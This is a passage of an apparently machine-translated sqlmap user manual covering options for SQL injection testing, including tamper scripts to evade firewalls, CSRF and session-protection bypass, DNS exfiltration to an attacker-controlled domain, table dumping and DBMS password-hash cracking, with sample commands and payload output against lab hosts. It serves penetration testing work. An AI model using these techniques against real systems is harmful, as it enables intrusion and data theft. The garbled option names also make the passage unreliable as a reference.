Randomly change the value of a given parameter

Options: - randomize

You can specify the name of a parameter whose value needs to be changed randomly during each request. The length and type are determined by the raw values provided.

Extracts the target from the specified agent log using a regular expression

Options: - scope

You can specify a valid Python regular expression to extract the desired target instead of all host targets parsed from the log by the option - l.

Examples of valid syntax:

$ python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"

Avoid session destruction caused by too many failed requests

Options: - safe URL, - safe post, - safe req and -- safe freq

Sometimes, after a certain number of failed requests are executed, the relevant sessions will be destroyed by Web application or detection technology. This may occur during the detection phase of the sqlmap, or when it utilizes any SQL blinding. The reason is that SQL payloads do not necessarily return output, so this may expose characteristics to application session management or detection technology.

To bypass this restriction set by the target site, you can provide any (or combination) of the following options:

• --Safe URL: the URL address that can be accessed safely and frequently during the test.
• --Safe post: use HTTP POST to send data to a secure URL address.
• --Safe req: load and use secure HTTP requests from files.
• --Safe freq: alternately execute the specified security address access and target test requests.

In this way, sqlmap will access a secure URL for each defined number of requests without performing any type of injection.

Turn off URL encoding for parameter values

Switch: - skip URLEncode

Depending on the location of the parameter (for example: GET), its value may be URL encoded by default. In some cases, the back-end Web server does not follow the RFC standard and requires the parameter values to be sent in the original non encoded form. In this case, you can use -- skip URLEncode.

Bypass anti CSRF protection

Options: - CSRF token and -- CSRF URL

Many sites have anti CSRF protection using token, and the hidden field value is randomly set in the response of each page. sqlmap will automatically try to identify and bypass this protection, and support options such as -- CSRF token and -- CSRF URL for further adjustment. Option -- CSRF token is used to set the name of the hidden field containing the random token. This is useful when the site uses non-standard names for these fields. Option -- CSRF URL is used to obtain the token value from any valid URL address. This is useful when the target URL does not initially contain the required token value and needs to be extracted from elsewhere.

Enforce SSL/HTTPS

Switch: - force SSL

Use this switch if you want to force SSL/HTTPS requests on the target. This switch is useful when using the option -- crawl to collect URLs or the option - l to provide Burp logs.

Run custom Python code during each request

Options: - eval

In cases where you may want to change (or add new) parameter values because of some known dependencies, you can use the option -- eval to provide custom python code for sqlmap, which will run before each request.

For example:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b9238\
20dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"

Each request like this will recalculate the corresponding MD5 hash value using the id parameter value in the current GET request, so as to replace the original hash parameter value. [

](https://octobug.gitbooks.io/sqlmap-wiki-zhcn/content/Users-manual/Usage/Request.html)

optimization

The following switches can be used to optimize the performance of sqlmap.

Batch optimization

Switch: - o

Setting this switch means that the following corresponding options and switches are implicitly turned on:

• --keep-alive
• --null-connection
• --threads=3 is the default value, and a larger value can be set.

See below for more details on switch settings.

Output prediction

Switch: - predict output

This switch is used to deduce the algorithm, which can analyze and predict the linear data characteristics of the obtained data. According to TXT / common outputs Txt inside the entries and set theory related knowledge to predict and give the most likely character mathematical statistics table. If the target character value can be found in the most common output results, the scope of the next character mathematical statistics table will be gradually reduced. With the instance, table name and corresponding permissions obtained from the DBMS, the acceleration effect will be significantly improved. Of course, you can edit common output files according to your own needs. For example, you find common patterns of database table names or other patterns.

It is worth noting that this switch cannot be used with -- threads.

HTTP Keep-Alive

Switch: - keep alive

This switch parameter sets sqlmap to use HTTP(s) persistent connection.

It is worth noting that this switch cannot be used with -- proxy.

HTTP NULL connection

Switch: - null connection

In HTTP requests, there are special types that can obtain the size of HTTP response without obtaining the whole HTTP entity. This technique can be used in SQL blind annotation to distinguish whether the response result is True or False. If this switch is turned on, sqlmap will test and utilize two different NULL connection technologies: Range and HEAD. If the target server can meet one of the request modes, it will reduce the bandwidth used and speed up the whole test process.

Details of these technologies can be found in the white paper Improve the performance of SQL blind injection -- Take 2 (bandwidth).

It is worth noting that this switch cannot be used with -- text only.

Concurrent HTTP(S) requests

Options: - threads

sqlmap supports setting the maximum concurrent number of HTTP(S) requests. This feature depends on Multithreading Therefore, it inherits the advantages and disadvantages of multithreading.

This feature can be used when the data is obtained through SQL blind injection technology or using brute force cracking related switches. For SQL blind annotation technology, sqlmap first calculates the length of the query target in a single thread, and then enables the multithreading feature to allocate a character of the query to each thread. When the character is successfully obtained, the thread will end and exit - combined with the half algorithm implemented in sqlmap, each thread can initiate HTTP(S) requests up to 7 times.

Considering the running performance and the reliability of the target site, the maximum number of concurrent requests of sqlmap can only be set to 10.

It is worth noting that this option cannot be used with -- predict output.

injection

The following options are used to specify the parameters to be tested, and provide custom injection payloads and optional tampering scripts.

Testable parameters

Options: - p, -- skip and -- param exclude

By default, sqlmap tests all GET and POST parameters. When the value of -- level > = 2, it also tests the HTTP Cookie header value. When this value > = 3, it also tests the HTTP user agent and HTTP Referer header values. You can also manually specify a comma separated parameter list that requires sqlmap to be tested. This makes sqlmap ignore the setting of -- level.

For example, if you only need to test the GET parameter id and HTTP user agent, provide - P "id, user agent".

If the user wants to exclude some parameters from testing, he can use the option -- skip. This option is useful when you want to use a high-level -- level value and specify some available parameters (excluding HTTP headers that are usually tested).

For example, to skip testing HTTP user agent and HTTP Referer at -- level=5, you can provide -- skip = "user agent, referer".

You can also exclude tests for some parameters based on regular expressions for parameter names. In this case, the user can use the option -- param exclude.

For example, to skip testing parameters with a token or session in their name, you can provide -- param exclude = "token | session".

URI injection point

There are some special cases where the injection point is within the URI itself. Sqlmap does not perform any automatic tests on URI paths unless specified manually. You need to indicate these injection points on the command line by appending an asterisk (*) after each URI point requiring sqlmap test and SQL injection (Note: it also supports Havij style% project here%).

For example, when using the Apache Web server mod_rewrite This is particularly useful when using modules or other similar technologies.

An example of a legal command line is as follows:

$ python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/"

Arbitrary injection point

Similar to URI injection points, the asterisk (*) (Note: it also supports Havij style% INJECT HERE%) can also be used to point to any injection point in GET, POST or HTTP headers. You can mark the parameter value of GET in option - u, the parameter value of POST in option -- data, the HTTP header value in option - H, such as -- headers, -- user agent, -- referer and / or -- cookie, or mark the general location in the HTTP request loaded from the file to specify the corresponding injection point.

An example of a legal command line is as follows:

$ python sqlmap.py -u "http://targeturl" --cookie="param1=value1*;param2=value2"

Specify DBMS type

Options: - dbms

By default, sqlmap automatically detects the backend DBMS of the Web application. Sqlmap fully supports the following database management systems:

• MySQL
• Oracle
• PostgreSQL
• Microsoft SQL Server
• Microsoft Access
• IBM DB2
• SQLite
• Firebird
• Sybase
• SAP MaxDB
• HSQLDB
• Informix

If, for some reason, sqlmap has identified the SQL injection but cannot detect the back-end DBMS type, or you want to avoid fingerprint information collection, you can provide the name of the back-end DBMS yourself (for example: postgresql). MySQL and Microsoft SQL server are provided in the form of MySQL < version > and Microsoft SQL Server < version > respectively, where < version > refers to the valid version of DBMS; For example, MySQL is 5.0 and Microsoft SQL server is 2005.

If you use -- DBMS and -- fingerprint at the same time, sqlmap will only perform detailed fingerprint collection on the specified DBMS. Please read the following for more details.

Note that this option is not mandatory and is strongly recommended only if you are absolutely sure of the backend DBMS. If you don't know, let sqlmap automatically identify the fingerprint information for you.

Specifies the DBMS operating system name

Options: - os

By default, when this information is dependent on any switch or option, sqlmap will automatically detect the underlying operating system information of the backend DBMS of the Web application. Currently, the fully supported operating systems are:

• Linux
• Windows

You can force a known operating system type so that sqlmap will avoid detecting this information.

Note that this option is not mandatory. It is strongly recommended to use it only when you are absolutely sure of the underlying operating system of the backend DBMS. If you don't know, let sqlmap automatically identify it for you.

Force a large number to invalidate the parameter value

Switch: - invalid bignum

When sqlmap needs to invalidate the original parameter value (for example: id=13), it will use a negative number (for example: id=-13). Use this switch to force the use of large integer values to achieve the same effect (for example: id = 9999999).

Force the use of logical operations to invalidate parameter values

Switch: - invalid logical

When sqlmap needs to invalidate the original parameter value (for example: id=13), it will use a negative number (for example: id=-13). Use this switch to force Boolean operations to achieve the same effect (for example: id=13 AND 18=19).

Force the use of random strings to invalidate parameter values

Switch: - invalid string

When sqlmap needs to invalidate the original parameter value (for example: id=13), it will use a negative number (for example: id=-13). Use this switch to force the use of random strings to achieve the same effect (for example: id=akewmc).

Turn off the payload construction mechanism

Switch: - no cast

When the generated results are returned, sqlmap converts all entries to string type and replaces NULL values with space characters. This is done to avoid any erroneous states (for example, connecting NULL values with strings) and to simplify the data retrieval process itself. However, according to the report, some cases (for example, the old version of MySQL DBMS) need to turn off this mechanism (use this switch) due to the problem of data retrieval itself (for example, the value of None is returned).

Turn off string escape mechanism

Switch: - no escape

When sqlmap needs to use the string in payloads (separated by single quotation marks) (for example, SELECT 'foobar'), these values will be automatically escaped (for example, SELECT CHAR(102)+CHAR(111)+CHAR(111)+CHAR(98)+CHAR(97)+CHAR(114)). There are two reasons for this: blurring the payload content and preventing potential query escape mechanisms on the back-end server (e.g. magic_quotes and / or mysql_real_escape_string). You can use this switch to turn it off (for example, when you need to reduce the size of the payload).

Custom injection payload

Options: - prefix and -- suffix

In some cases, vulnerable parameters can be exploited only if the user provides a specific suffix attached to the injected payload. In addition, these options are convenient for this scenario when the user already knows the query syntax and wants to detect the use of SQL injection by directly providing the injected payload prefix and suffix.

Vulnerability source code example:

$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";

To detect and take advantage of this SQL injection, you can let sqlmap detect boundaries (combined with SQL payload prefix and suffix) during the detection phase, or provide it yourself.

For example:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php\
?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"
[...]

This will cause all sqlmap requests to eventually form the following query:

$query = "SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1";

To make the query syntax correct.

In this simple example, sqlmap can detect SQL injection and use it without providing custom boundaries, but sometimes in real-world applications, when the injection point exists in nested JOIN queries, it needs to be provided.

Modify injection data

Options: - tamper

sqlmap itself does not confuse the sent payload, except that the string between single quotes is replaced with a string such as CHAR().

This option is useful if there is a weak authentication mechanism between the backend DBMS and user input. This verification mechanism is usually used by the application source code to call the self-developed input verification routine, such as expensive enterprise IPS device or Web application firewall (WAF). In a word, they are usually implemented in different ways and cost a lot of money.

To take advantage of this option, you need to provide a comma separated list of modification scripts for sqlmap, which will process the payload and return the conversion results. You can define your own modification scripts, edit and use the scripts in the sqlmap tamper / folder, and connect them with commas as as the values of the -- tamper option (for example: -- tamper = "between, random case").

The legal modification script format is as follows:

# Needed imports
from lib.core.enums import PRIORITY

# Define which is the order of application of tamper scripts against
# the payload
__priority__ = PRIORITY.NORMAL

def tamper(payload):
    '''
    Description of your tamper script
    '''

    retVal = payload

    # your code to tamper the original payload

    # return the tampered payload
    return retVal

You can view valid and available modification scripts in the tamper / directory.

For MySQL targets, SELECT strings that assume characters >, spaces, and uppercase are prohibited:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --\
tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

[hh:mm:03] [DEBUG] cleaning up configuration parameters
[hh:mm:03] [INFO] loading tamper script 'between'
[hh:mm:03] [INFO] loading tamper script 'randomcase'
[hh:mm:03] [INFO] loading tamper script 'space2comment'
[...]
[hh:mm:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[hh:mm:04] [PAYLOAD] 1)/**/And/**/1369=7706/**/And/**/(4092=4092
[hh:mm:04] [PAYLOAD] 1)/**/AND/**/9267=9267/**/AND/**/(4057=4057
[hh:mm:04] [PAYLOAD] 1/**/AnD/**/950=7041
[...]
[hh:mm:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[hh:mm:04] [PAYLOAD] 1/**/anD/**/(SELeCt/**/9921/**/fROm(SELeCt/**/counT(*),CONC
AT(cHar(58,117,113,107,58),(SELeCt/**/(case/**/whEN/**/(9921=9921)/**/THeN/**/1/
**/elsE/**/0/**/ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x/**/fROm/**/info
rmation_schema.tables/**/group/**/bY/**/x)a)
[hh:mm:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or
 HAVING clause' injectable 
[...]

testing

The following related options can be used to customize the detection phase.

level

Options: - level

To use this option, you need to give a parameter to specify the level of detection to be performed. There are five levels in total. The default level is 1, which only performs simple detection (request). In contrast, level 5 detects a wider range of payloads and boundaries (as prefixes and suffixes to SQL payload s) in more detail. Payloads used by sqlmap are extracted directly from the text file XML / payloads Load in XML. Set according to the relevant instructions at the top of the file. If the sqlmap misses a specific injection, you can choose to modify the specified payload for detection.

This option setting will not only affect the payload used by sqlmap, but also affect the relevant test injection points: always test the relevant parameters of GET and POST. If the level is greater than or equal to 2, the HTTP Cookie header will be tested, and if the level is greater than or equal to 3, the HTTP UserAgent/Referer header value will be tested.

In short, the higher the difficulty of SQL injection detection, the higher the -- level value needs to be set.

It is strongly recommended that you try to set a higher -- level value for detection before feeding back to the sqlmap mailing list that sqlmap cannot detect a specific type of injection.

risk

Options: - risk

This option needs to give a parameter to specify the risk level to be tested. There are three risk levels in total. The default level is 1, and there is no risk for most SQL injection points. Risk level 2 will add a large number of temporal blind note statement tests on the default detection, and level 3 will add OR Boolean blind note tests on the original basis.

In some scenarios, such as SQL injection into an UPDATE statement, injecting an OR type payload will cause all records of the target data table to be updated. Obviously, this is not the result that the attacker wants. For this scenario and other related scenarios, sqlmap introduces the -- risk option. Through this option, the user can specify to detect a specific payload, and the user can choose to use potentially dangerous operations at will. As mentioned in the options above, payloads used by sqlmap are directly in the text file XML / payloads XML, which supports user-defined editing and addition.

Page comparison

Line selection: - string, - not string, - regexp and -- code

By default, a True query and a False query (the related concept behind Boolean blind annotation) are distinguished by comparing whether the returned result pages before and after injection are consistent.

However, this reference method is not necessarily effective, because the page content may be updated accordingly even if it is not injected. For example, there are counters on the page, dynamic advertising banners, or any content that is dynamically rendered based on time rather than user input. In order to avoid similar situations, sqlmap will try to identify the request content returned by the corresponding code segment and handle it properly. Sometimes, this situation may not be handled correctly, which is why sqlmap allows users to provide a string (- - string option). This string needs to appear in the original page (this is not mandatory) and all page queries with query results of True, and does not appear in pages with query results of False. In addition to providing static strings, users can provide regular expressions (- - regexp option) for matching. In addition, the user can provide a string (- - not string option), which cannot appear on the original page or all pages with query results of True, but always on the pages with query results of False.

By injecting illegal values into relevant parameters and manually comparing the difference between the original page (without injection) and the injection result page, the target string can be easily obtained. Through the definition in this way, the different judgment of the page will be based on the matching of the string or regular expression specified by the user.

If the user knows that True query and False query can be distinguished by HTTP status code (for example, 200 corresponds to True and 401 corresponds to False), the corresponding information can be provided to sqlmap. (for example: -- code=200).

Switches: - text only and -- titles

If users know that True queries and False queries can be distinguished by HTML titles (for example, Welcome corresponds to True and Forbidden corresponds to False), they can use -- titles to turn on the switch based on Title Comparison.

If there is invalid information (such as script, nested element, etc.) in the HTTP response message, you can only obtain the text content by filtering the content of the page (switch -- text only). In this way, in most cases, this will automatically tune the detection engine.

technology

The following options can be used to adjust the testing of specific SQL injection technologies.

SQL injection technology used in the test

Options: - technique

This option is used to specify the type of SQL injection to be tested. By default, sqlmap tests all types / technologies it supports.

In some cases, you may only want to test one or more specific types of SQL injection, which is the purpose of this option.

This option requires a parameter value. This parameter is a string composed of characters such as B, E, U, S, T and Q. each letter represents a different technology:

• B: Boolean blind injection
• E: Error reporting injection
• U: Joint query injection
• S: Heap query injection
• T: Time blind injection
• Q: Inline query injection

For example, if you only test using error type injection and heap query injection, you can provide ES. The default value is BEUSTQ.

Note that when you need to access the file system, take over the operating system, or access the Windows registry hive, the supplied string must contain the letter S representing heap query technology.

Set the number of seconds of DBMS delayed response in time type blind injection

Options: - time sec

Provide an integer for -- time sec to set the delay time of time-based blind injection response. By default, its value is 5 seconds.

Specifies the number of columns in the federated query injection

Options: - Union cols

By default, sqlmap uses 1 to 10 columns for federated query injection. Of course, you can increase this range to up to 50 columns by providing a higher -- level value. For details, see the relevant paragraphs.

You can manually specify the option -- union cols and the corresponding number range to test a specific range of columns for this type of SQL injection. For example, 12-16 represents a joint query injection test with 12 to 16 columns.

Characters used to test union query injection

Options: - Union char

By default, SQL map test union query injection uses NULL characters. However, by providing a higher -- level value, sqlmap will perform a random number test, because there are a few cases where joint query injection using NULL will fail and random integer will succeed.

You can manually provide the option -- union char and the required number (for example: -- union char 123) to test this type of SQL injection.

Tables used in the FROM clause in federated query injection

Options: - Union from

In partial federated query injection, you need to force the use of valid and accessible table names in the FROM clause. For example, Microsoft Access requires such a table. If such a table is not provided, federated query injection will not work properly (for example: -- Union FROM = users).

DNS percolation attack

Options: - DNS domain

DNS oozing SQL injection attack in the article Data Retrieval over DNS in SQL Injection Attacks There is a translation of this article in the dark cloud knowledge base, Using DNS to get data in SQL injection )And the implementation of sqlmap can be found on the slide DNS exudation attack using sqlmap Found in.

If the user is controlling a host registered as a DNS domain name server (for example: domain name attacker.com), you can use this option (for example: -- DNS domain attacker.com) to enable this attack. Its precondition is to run sqlmap with Administrator (i.e. Administrator) permission (because privileged port 53 is required), and common (blind injection) technology can be used to attack. If an effective attack mode (preferably temporal blind injection) has been identified, this attack can speed up the process of obtaining data. If error reporting injection or joint query injection technology is available, DNS exudation attack test will be skipped by default.

Second order SQL injection attack

Options: - Second Order

When a vulnerable page is attacked, its payload injection result is displayed (reflected) in another page (e.g. frame). This attack is called second-order SQL injection attack. Usually, the user input content of the original page is stored in the database, resulting in related vulnerabilities.

You can manually provide the option -- second order with the URL address of the display result page to test this type of SQL injection.

fingerprint identification

Extensive DBMS fingerprint identification

Switch: - f or -- fingerprint

The default sqlmap will automatically help you identify the relevant information of the backend DBMS of the Web application. At the end of the detection phase and remind the user to further select the detection injectable parameters, sqlmap will automatically identify the back-end DBMS information, and adopt the appropriate SQL syntax, dialect and related queries according to the specific database architecture for further attack testing.

If you want to use specific SQL dialects or technologies with specific error information to carry out detailed DBMS fingerprint identification, you can provide the -- fingerprint switch. In this way, sqlmap will initiate more requests and collect fingerprints on DBMS version, even operating system, system architecture and patch level information.

If you want more accurate fingerprint identification results, you can provide switch-b or -- banner.

enumeration

The following options can be used to enumerate back-end DBMS information, table structure and data contained in the table. In addition, you can run custom SQL statements.

Get all data

Switch: - all

When users want to obtain all accessible data information remotely by using a single switch, they can use the switch. This is generally not recommended because it generates a large number of requests and obtains useful and useless data.

Banner

Switch: - b or -- banner

Most modern DBMS have a function and / or an environment variable that returns the DBMS version and eventually details the underlying system at its patch level. Usually, this function is version(), and the environment variable is @ @ version, which depends on the target DBMS.

Examples for Oracle targets:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" -\
-banner

[...]
[xx:xx:11] [INFO] fetching banner
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'

Current session user

Switch: -- current user

Using this switch, you can get the DBMS user who is currently executing the relevant database query operation from the Web application.

Current database

Switch: - current DB

Use this switch to get the name of the DBMS database to which the Web application connects.

Server host name

Switch: - hostname

Use this switch to get the host name of the DBMS.

Example for MySQL target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --\
hostname

[...]
[xx:xx:04] [INFO] fetching server hostname
[xx:xx:04] [INFO] retrieved: debian-5.0-i386
hostname:    'debian-5.0-i386'

Detect whether the current session user is a database administrator

Switch: - is DBA

It can detect whether the current DBMS session user is a database administrator, also known as DBA. If yes, sqlmap will return True; otherwise, it will return False.

List all users of DBMS

Switch: - users

If the current session user has read permission to the system table containing DBMS user information, you can enumerate the user list.

List and crack the password hash of DBMS users

Switches: - passwords

If the current session user has read permission to the system table containing DBMS user password information, you can enumerate the password hash value of each DBMS user. sqlmap will enumerate all users and one-to-one corresponding user password hashes.

Example for PostgreSQL target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --\
passwords -v 1

[...]
back-end DBMS: PostgreSQL
[hh:mm:38] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[hh:mm:42] [INFO] using hash method: 'postgres_passwd'
what's the dictionary's location? [/software/sqlmap/txt/wordlist.txt] 
[hh:mm:46] [INFO] loading dictionary from: '/software/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)
[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'
[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'
database management system users password hashes:
[*] postgres [1]:
    password hash: md5d7d880f96044b72d0bba108ace96d1e4
    clear-text password: testpass
[*] testuser [1]:
    password hash: md599e5ea7a6f7c3269995cba3927fd0093
    clear-text password: testpass

In the above example, sqlmap not only enumerates DBMS users and their passwords, but also identifies that the password hash format belongs to PostgreSQL, asks the user whether to use the dictionary file for hash test, and identifies the plaintext password of user postgres, which is usually DBA, and the password of user testuser.

This function has been implemented for DBMS that can enumerate user password hashes, including Oracle and Microsoft SQL Server 2005 and subsequent versions.

You can also use the - U option to specify the specific users to enumerate and crack their corresponding password hash. If you provide CU as the user name, it will treat it as the alias of the current user and get the password hash value of this user.

List all user permissions of DBMS

Switch: - privileges

If the current session user has read permission to the system table containing DBMS user information, the permissions of each DBMS user can be listed. According to the permission information, sqlmap will also show which database administrators are.

You can also use the - U option to specify the user to list permissions.

If you provide CU as the user name, it will treat it as the alias of the current user and get the permission information of this user.

In Microsoft SQL Server, this function will display whether each user is a database administrator, rather than the permission list of all users.

List all user roles of DBMS

Switch: - roles

If the current session user has read permission to the system table containing DBMS user information, the role of each DBMS user can be listed.

You can also use the - U option to specify the users to List roles.

If you provide CU as the user name, it will treat it as the alias of the current user and get the role information of this user.

This feature is only available when the DBMS is Oracle.

List all DBMS databases

Switch: - dbs

If the current session user has read permission to the system table containing the database information available to DBMS, the current database list can be listed.

Enumerating data tables

Switches and options: - tables, - exclude sysdbs and - D

If the current session user has read permission to the system table containing DBMS data table information, the data table of a specific DBMS can be listed.

If you do not use option - D to specify the database, sqlmap will enumerate the tables of all DBMS databases.

You can also provide the switch -- exclude sysdbs to exclude all system databases.

Note that for Oracle, you need to provide TABLESPACE_NAME instead of the database name.

Enumerate the column names of the data table

Switches and options: - columns, - C, - T and - D

If the current session user has read permission to the system table containing DBMS data table information, the column name of a specific data table can be listed. sqlmap will also enumerate the data types of all columns.

This function can use option - T to specify the table name and option - D to specify the database name. If no database name is specified, the current database name is used. You can also use option - C to specify the table column names to enumerate.

Examples for SQLite targets:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" -\
-columns -D testdb -T users -C name
[...]
Database: SQLite_masterdb
Table: users
[3 columns]
+---------+---------+
| Column  | Type    |
+---------+---------+
| id      | INTEGER |
| name    | TEXT    |
| surname | TEXT    |
+---------+---------+

Note that for PostgreSQL, you need to provide the name of public or system database. This is because it is impossible to enumerate other database tables. Only the tables in the database mode to which the Web application user is connected can be listed. They are always alias public.

Enumerate DBMS modes

Switches: - schema and -- exclude sysdbs

The user can use this switch to obtain the DBMS mode. The schema list will contain all databases, tables, and columns and their respective types. Combined with -- exclude sysdbs, only the schema containing non system database will be obtained and displayed.

Example for MySQL target:

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/mysql/get_int.php?id=1" --s\
chema--batch --exclude-sysdbs

[...]
Database: owasp10
Table: accounts
[4 columns]
+-------------+---------+
| Column      | Type    |
+-------------+---------+
| cid         | int(11) |
| mysignature | text    |
| password    | text    |
| username    | text    |
+-------------+---------+

Database: owasp10
Table: blogs_table
[4 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| date         | datetime |
| blogger_name | text     |
| cid          | int(11)  |
| comment      | text     |
+--------------+----------+

Database: owasp10
Table: hitlog
[6 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| date     | datetime |
| browser  | text     |
| cid      | int(11)  |
| hostname | text     |
| ip       | text     |
| referer  | text     |
+----------+----------+

Database: testdb
Table: users
[3 columns]
+---------+---------------+
| Column  | Type          |
+---------+---------------+
| id      | int(11)       |
| name    | varchar(500)  |
| surname | varchar(1000) |
+---------+---------------+
[...]

Gets the number of data entries in the data table

Switch: - count

You can use this switch if you want to know the number of entries in the table before exporting the required table data.

Example for Microsoft SQL Server target:

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1"\
 --count -D testdb
[...]
Database: testdb
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.users      | 4       |
| dbo.users_blob | 2       |
+----------------+---------+

Export data table entries

Switches and options: - dump, - C, - T, - D, - start, - stop, - first, - last, - pivot column and -- where

If the current session user has read permission on a specific data table, you can export data table entries.

This function relies on option - T to specify the table name, and option - D to specify the database name. If a table name is provided instead of a database name, the current database is used.

Example for Firebird target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1"\
 --dump -T users
[...]
Database: Firebird_masterdb
Table: USERS
[4 entries]
+----+--------+------------+
| ID | NAME   | SURNAME    |
+----+--------+------------+
| 1  | luther | blisset    |
| 2  | fluffy | bunny      |
| 3  | wu     | ming       |
| 4  | NULL   | nameisnull |
+----+--------+------------+

This switch can also be used to export all entries of the specified database data table. You only need to provide the switch -- dump and option - D (not - T and - C).

You can also use option - C to provide a comma separated list of specific column names to export data.

Sqlmap can also generate a corresponding CSV format text file for each table to store the exported data. You can view the absolute path of the file created by sqlmap by providing a level of detail greater than or equal to 1.

If you only want to export items in a specific range, you can provide options -- start and / or -- stop to specify which data to start exporting from and stop at. For example, if you export only the first entry, provide -- stop 1 on the command line. Or if you only want to export the second and third entries, provide -- start 1 --stop 3.

You can also use the options -- first and -- last to specify a single character or a specific range of characters to export. For example, if you want to export the third to fifth characters of an entry, provide -- first 3 --last 5. This function is only applicable to blind injection technology, because the number of requests initiated by error reporting injection and joint query injection technology is exactly the same regardless of the length of column data entries.

In some cases (for example, for Microsoft SQL Server, Sybase and SAP MaxDB), due to the lack of similar mechanisms, OFFSET m, n cannot be used to directly export the data of the table. In this case, sqlmap exports the data by determining the most suitable pivot column (the column with unique value, generally the primary key) and using this column to retrieve other column values. If you need to force the use of a specific column because the automatically selected pivot column is not applicable (for example, due to the lack of table export results), you can use the option -- pivot column (for example: -- pivot column = ID).

If you want to restrict the export of specific column values (or ranges), you can use the option -- WHERE. The provided logical operation will be automatically used within the WHERE clause. For example, if -- WHERE = "ID > 3" is used, only rows with an ID value greater than 3 will be obtained (by appending WHERE id > 3 to the query statement used).

As you may have noticed, sqlmap is very flexible: you can automatically export it to the entire database table, or export entries with specific characters, columns and ranges very accurately.

Export all data table entries

Switches: - dump all and -- exclude sysdbs

If the read permission of the current session user allows, you can export all database table entries at once.

You can also provide the switch -- exclude sysdbs to exclude all system databases. In this case, sqlmap will only export the database table entries of the current user.

Note that for Microsoft SQL Server, the master database is not considered a system database because some database administrators use it as a user database.

Search columns, tables, or databases

Switches and options: - search, - C, - T, - D

This switch allows you to search for specific database names and table names in all databases and specific column names in specific data tables.

This is useful, for example, to identify a table that contains application credentials, where the names of the relevant columns contain strings such as name and pass.

The switch -- search needs to be used with the following support options:

• -C. Search the entire DBMS with a comma separated list of column names.
• -T. Search the entire DBMS with a comma separated list of table names.
• -D. Search the entire DBMS with a comma separated list of database names.

Run custom SQL statements

Options and switches: -- SQL query and -- SQL shell

The SQL query and SQL shell functions allow arbitrary SQL statements to be run on the DBMS. sqlmap will automatically parse the provided statement, determine which technology is suitable for injecting it, and how to package the corresponding SQL payload.

If the query is a SELECT statement, sqlmap gets its output. Otherwise, if the back-end DBMS of the Web application supports multiple statements, it will execute the query through heap query injection technology. Note that some Web application technologies do not support heap queries on a particular DBMS. For example, PHP does not support heap queries when the backend DBMS is MySQL, but it does when the backend DBMS is PostgreSQL.

Example for Microsoft SQL Server 2000 target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --\
sql-query "SELECT 'foo'" -v 1

[...]
[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
[hh:mm:14] [INFO] retrieved: foo
SELECT 'foo':    'foo'

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --\
sql-query "SELECT 'foo'，'bar'" -v 2

[...]
[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now 
unpack it into distinct queries to be able to retrieve the output even if we are
 going blind
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS 
VARCHAR(8000)), (CHAR(32)))
[hh:mm:50] [INFO] retrieved: foo
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VA
RCHAR(8000)), (CHAR(32)))
[hh:mm:50] [INFO] retrieved: bar
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
SELECT 'foo', 'bar':    'foo, bar'

As you can see, sqlmap decomposes the provided query into two different SELECT statements, and then obtains the output of each query separately.

If the query provided is a SELECT statement and contains a FROM clause, sqlmap will ask if you can return multiple entries. In this case, it knows how to parse the returned results, calculate the specified number of entries one by one, and give the relevant output.

The SQL shell option allows you to run your own SQL statements interactively, just like connecting directly to the SQL console of the DBMS. This feature also provides TAB completion and input history support.

brute force

The following switches can be used for brute force detection.

Brute force cracking table name

Switch: - common tables

In some scenarios, the switch -- tables cannot be used to obtain the names of tables in the database. Such scenarios usually occur in the following situations:

• DBMS is MySQL version < 5.0, and they do not have information_schema.
• DBMS is Microsoft's Access database, and the system table MSysObjects in it is unreadable by default.
• The current session user does not have read permission to the system table defined by the data table stored in the DBMS.

